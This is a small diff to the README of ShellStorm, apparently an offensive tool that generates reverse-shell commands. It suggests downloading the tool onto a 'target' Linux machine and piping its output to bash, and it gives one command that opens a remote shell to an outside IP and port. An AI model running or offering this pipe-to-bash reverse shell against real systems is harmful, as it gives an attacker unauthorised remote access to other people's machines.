0bfxgh0st/ShellStorm/README.md

 ![alt text](https://github.com/0bfxGH0ST/ShellStorm/blob/main/screenshots/screenshot2.png)

 ## Try go further
-In some cases you can download shellstorm in any 'target' machine with Linux kernel (or WSL) and execute it by piping it.
+In some cases you can download shellstorm in any 'target' machine with Linux kernel (or WSL) and execute it by piping it if you prefer.
 <pre>
 bash shellstorm.sh bash 10.2.54.13 1337 | bash
 </pre>